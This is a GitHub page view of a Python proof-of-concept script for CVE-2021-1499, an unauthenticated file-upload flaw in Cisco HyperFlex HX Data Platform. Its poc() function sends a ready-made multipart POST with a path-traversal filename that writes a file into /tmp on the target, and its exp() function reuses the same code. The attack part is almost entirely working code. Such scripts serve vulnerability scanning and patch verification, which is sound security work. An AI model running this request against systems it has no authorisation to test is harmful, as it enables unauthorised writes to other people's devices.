-
Notifications
You must be signed in to change notification settings - Fork 220
/
Copy pathCVE-2021-1499.py
74 lines (57 loc) · 2.69 KB
/
CVE-2021-1499.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Cisco HyperFlex HX Data Platform - File Upload Vulnerability''',
"description": '''A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user.''',
"severity": "medium",
"references": [
"https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/",
"https://nvd.nist.gov/vuln/detail/CVE-2021-1499"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2021-1499",
"cwe-id": "CWE-306"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "cisco", "fileupload", "intrusive"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/upload"""
method = "POST"
data = """-----------------------------253855577425106594691130420583
Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9"
Content-Type: application/json
MyPasswdNewData->/api/tomcat
-----------------------------253855577425106594691130420583--"""
headers = {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'multipart/form-data; boundary=---------------------------253855577425106594691130420583'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp0.status_code == 200) and ("""application/json""" in str(resp0.headers)) and ("""{"result":""" in resp0.text and """filename:""" in resp0.text and """/tmp/passwd9""" in resp0.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url